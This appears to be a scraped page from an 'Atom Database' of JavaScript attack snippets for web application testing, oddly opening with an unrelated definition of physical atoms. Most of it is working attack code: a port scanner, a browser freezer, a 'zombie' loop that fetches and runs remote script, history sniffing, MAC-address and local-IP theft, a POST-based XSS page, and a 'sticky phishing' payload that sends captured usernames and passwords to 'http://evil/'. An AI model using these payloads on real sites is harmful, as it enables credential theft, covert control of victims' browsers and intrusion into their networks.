Atom Database
Atom is The smallest part of a substance which can exist and still retain the properties of the substance. All familiar matter consists of atoms. An atom consists of a positively charged nucleus and orbiting electrons. The simplest atom is hydrogen (one proton and one electron), and the largest atom in nature is uranium (92 protons, 92 electrons, and 146 neutrons). KU
The purpose of this project is to collect useful attack snippets, which can be employed when performing WEB Application Security testing.
Archived Comments
getNetInfo
Retrieve network information. By using this function attackers can retrieve information about the local NATed IP address and host name. This information is highly sensitive since it enables attackers to conduct attacks on Intranet resources.
function getNetInfo() {
var sock = new java.net.Socket();
sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0));
sock.connect(new java.net.InetSocketAddress(document.domain, (!document.location.port)?80:document.location.port));
return {domain: sock.getLocalAddress().getHostName(), ip: sock.getLocalAddress().getHostAddress()};
}
Firefox, Opera, Live Connect, JavaScript, Information Gathering
Freeze
Freeze the browser for defined time. The time is in milliseconds. While frozen, users are unable to interact with the browser. Certain browsers may terminate the script if the time value is too high. Attackers can use this function to force the browser to wait until certain remote event occurs.
function freeze(time) {
var date = new Date();
var cur = null;
do {
cur = new Date();
} while(cur - date < time);
}
All Browsers, JavaScript, freeze, DoS
googleAjaxSearch
Perform searches with Google from the browser. This technique can be employed by attackers in order to make self-propagating Ajax worms. The worms finds new targets via Google and uses your browser to attack.
function googleAjaxSearch(callback, query, key, context) {
if (googleAjaxSearch.callbacks == undefined)
googleAjaxSearch.callbacks = new Array();
var key = (key == undefined)?'internal-documentation':key;
var context = (context == undefined)?0:context;
var script = document.createElement('script');
script.defer = true;
script.type = 'text/javascript';
script.src = 'http://www.google.com/uds/GwebSearch?callback=googleAjaxSearch.callbacks.callback' + googleAjaxSearch.callbacks.length + '&context=' + context + '&lstkp=0&rsz=large&hl=en&q=' + query + '&key=' + key + '&v=0.1';
googleAjaxSearch.callbacks['callback' + googleAjaxSearch.callbacks.length] = function (context, results, status) {
document.body.removeChild(script);
delete googleAjaxSearch.callbacks['callback' + googleAjaxSearch.callbacks.length];
callback(results, query, key, context, status);
};
document.body.appendChild(script);
}
All Browsers, JavaScript, Google, search
portScan
Perform port scanning. This not the only way attackers can perform port scanning. You need to adjust the timeout value in order to achieve the most desired result. This technique can be quite inaccurate sometimes.
function portScan(callback, target, ports, timeout) {
var timeout = (timeout == null)?100:timeout;
for (index = 0; index < ports.length; index++)
new function () {
var img = new Image();
img.onload = img.onerror = function () {
if (!img) return;
img = undefined;
callback(target, ports[index], true);
};
img.src = 'http://' + target + ':' + ports[index];
window.setTimeout(function () {
if (!img) return;
img = undefined;
callback(target, ports[index], false);
}, timeout);
};
}
All Browsers, JavaScript, portscan
getURLJ
Retrieve remote content by using Java Live Connect. This function is very suitable when a binary files is required to be downloaded. Works only on Live Connect browsers.
function getURLJ(url) {
var data = null;
var destination = new java.net.URL(url);
var buffer = java.lang.reflect.Array.newInstance(java.lang.Byte.TYPE, 65536);
var stream = destination.getContent();
while (true) {
var count = stream.read(buffer);
if (count <= 0)
break;
var str = new java.lang.String(buffer, 0, count);
data += str;
}
stream.close();
return data;
}
Firefox, Opera, Live Connect, JavaScript
zombie
Attach a zombie. This function will perform queries to "url" on a regular basis (specified by interval). Retrieved data is evaluated as a JavaScript expressions.
function zombie(url, interval) {
var interval = (interval == null)?2000:interval;
setInterval(function () {
var script = document.createElement('script');
script.defer = true;
script.type = 'text/javascript';
script.src = url;
document.body.appendChild(script);
}, interval);
}
All Browsers, JavaScript, zombie
getDocument
Retrieve the document object in a cross-browser manner. This function is very useful when the attacker want to read the content of a particular iframe or frame.
function getDocument(target) {
if (target == undefined)
return document;
else if (target.contentDocument)
return target.contentDocument;
else if (target.contentWindow)
return target.contentWindow.document;
else if (target.document)
return target.document;
else
throw 'unable to get document object';
}
All Browsers, JavaScript, document, iframe
historyScan
Scan user history. This function enumerates the current user visited links by performing checks on their style.
function getDocument(target) {
if (target == undefined)
return document;
else if (target.contentDocument)
return target.contentDocument;
else if (target.contentWindow)
return target.contentWindow.document;
else if (target.document)
return target.document;
else
throw 'unable to get document object';
}
function historyScan(callback, URLs) {
var iframe = document.createElement('iframe');
iframe.style.visibility = 'hidden';
document.body.appendChild(iframe);
var doc = getDocument(iframe);
doc.open();
doc.write('<style>a:visited{display: none}</style>');
doc.close();
for (index = 0; index < URLs.length; index++) {
var a = doc.createElement('a');
a.href = URLs[index];
doc.body.appendChild(a);
if (a.currentStyle)
var display = a.currentStyle['display'];
else
var display = doc.defaultView.getComputedStyle(a, null).getPropertyValue('display')
callback(URLs[index], display == 'none'?true:false);
}
document.body.removeChild(iframe);
}
All Browsers, JavaScript, history, scan
b64encode
This function encodes a string in base64 format.
function b64encode(input) {
var b64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
var result = '';
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
do {
chr1 = input.charCodeAt(i++);
chr2 = input.charCodeAt(i++);
chr3 = input.charCodeAt(i++);
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if (isNaN(chr2)) {
enc3 = enc4 = 64;
} else if (isNaN(chr3)) {
enc4 = 64;
}
result += b64chars.charAt(enc1) + b64chars.charAt(enc2) + b64chars.charAt(enc3) + b64chars.charAt(enc4);
} while (i < input.length);
return result;
}
JavaScript, Cross-platformed, base64, Encodings
b64decode
This function decodes base64 strings.
function b64decode(input) {
var b64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
var result = '';
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
var input = input.replace(/[^A-Za-z0-9\+\/\=]/g, '');
do {
enc1 = b64chars.indexOf(input.charAt(i++));
enc2 = b64chars.indexOf(input.charAt(i++));
enc3 = b64chars.indexOf(input.charAt(i++));
enc4 = b64chars.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
result += String.fromCharCode(chr1);
if (enc3 != 64)
result += String.fromCharCode(chr2);
if (enc4 != 64)
result += String.fromCharCode(chr3);
} while (i < input.length);
return result;
}
JavaScript, Cross-platformed, base64, Encodings
Firefox B64 Functions
These functions are part of the javascript window object in the Gecko engine.
alert (btoa("test"));
alert (atob("dGVzdA=="));
JavaScript, Firefox, base64, Encodings
include
Load a remote script file. This function is non-blocking which means that you have to wait for the script to load before using its declarations.
function include(url) {
document.write('<' + 'script src="' + url + '" language="javascript" type="text/javascript"' + '>' + '<' + '/script' + '>');
}
JavaScript, All Browsers, include, modules
include
Load a remote script file. This function is non-blocking which means that you have to wait for the script to load before using its declarations. For that reason you may want to use the onload callback function.
function include(url, onload) {
var script = document.createElement('script');
script.type = 'text/javascript';
script.onload = onload;
script.src = url;
document.body.appendChild(script);
}
Mozilla, Firefox, Opera, include, modules
forcefocus
This function can be used to force the focus on a particular element from the current dom.
function forcefocus(target, timeout) {
var timeout = (timeout == undefined) ? 500 : timeout;
target.focus();
setTimeout(function () {
forcefocus(target);
}, timeout);
}
All Browsers, focus
walkJSON
This function walk the entire JSON (the j parameter) tree. The c parameter is the function that handles walked nodes.function walkJSON(j, c) {
if (typeof(c) != 'function') {
return;
}
for (var i in j) {
c(i, j[i]);
if (j[i] instanceof Array || typeof(j[i]) == 'object') {
arguments.callee(j[i], c);
}
}
}
universalparseURL
This function parse the URL into an object.function parseURL(url) {
var REGEX = /^((\w+):\/\/)?((\w+):?(\w+)?@)?([^\/\?:]+):?(\d+)?(\/?[^\?#]+)?\??([^#]+)?#?(\w*)/;
var fields = {'href': 0, 'username' : 4, 'password' : 5, 'port' : 7, 'protocol' : 2, 'host' : 6, 'hostname' : 6, 'pathname' : 8, 'search' : 9, 'hash' : 10};
var result = new Object();
var r = REGEX.exec(url);
for (var field in fields) {
result[field] = r[fields[field]];
}
result.hash = result.hash?'#' + result.hash:'#';
result.search = result.search?'?' + result.search:'?';
result.username = result.username?result.username:'';
result.password = result.password?result.password:'';
if (result.port == undefined) {
switch (result.protocol) {
case 'http':
result.port = 80;
break;
case 'https':
result.port = 443;
break;
case 'ftp':
result.port = 21;
break;
default:
result.port = '';
break;
}
}
return result;
}
universalSTICKY PHISHING
This payload launches a phishing attack to the user. It's sticky cuz it won't stop prompting the victim to enter his username and password until he enters both. Once obtained they are forwarded to a third-party site. Ideal for persistent XSS attacks.do{a=prompt("APP_OR_SITE_NAME: an error has ocurred\nPlease enter your USERNAME","");b=prompt("APP_OR_SITE_NAME: an error has ocurred\nPlease enter your PASSWORD","");} while(a==null || b==null || a=="" || b=="");alert("owned!:"+a+"/"+b);window.location="http://evil/?u="+a+"&p="+b
JavaScript, Universal, Password TheftPOST METHOD XSS
Attack HTML page for XSS vuls that can only be exploited as a POST request (as opposed to GET)<html>
<!-- this page would be hosted on the attacker's site and the victim would need to be tricked into visiting it -->
<form method="post" action="http://target/vulnerable.jsp">
<input type="text" name="param" value='<script>alert("XSS")</script>'>
</form>
<script>document.forms[0].submit();</script>
</html>
Universal, HTML, JavaScriptMAC ADDRESS
You can steal the user's MAC address with Java 1.6. For Internet Explorer you can use an applet. This information is very sensitive, because the MAC address is a unique identifier. Although it can be easily changed by the user, it can be useful to identify some users with dynamic IP address or using proxies.function get_mac() {
try {
var ifaces = java.net.NetworkInterface.getNetworkInterfaces()
var ifaces_list = java.util.Collections.list(ifaces);
for (var i = 0; i < ifaces_list.size(); i++) {
var mac = ifaces_list.get(i).getHardwareAddress();
if (mac) {
return mac;
}
}
} catch (e) { }
return false;
}
Firefox, Opera, Live Connect, Java SE 6, JavaScript, Information Gathering
Framejack
Hijack the current user browser window. This technique employs a single 100%x100% frame that sits on the top of the currently exploited remote content. When the user interacts with the browser window or tab the attacker persists state. This state is lost as soon as the user moves to another URL.
All Browsers, JavaScript, hijack, frame, persistency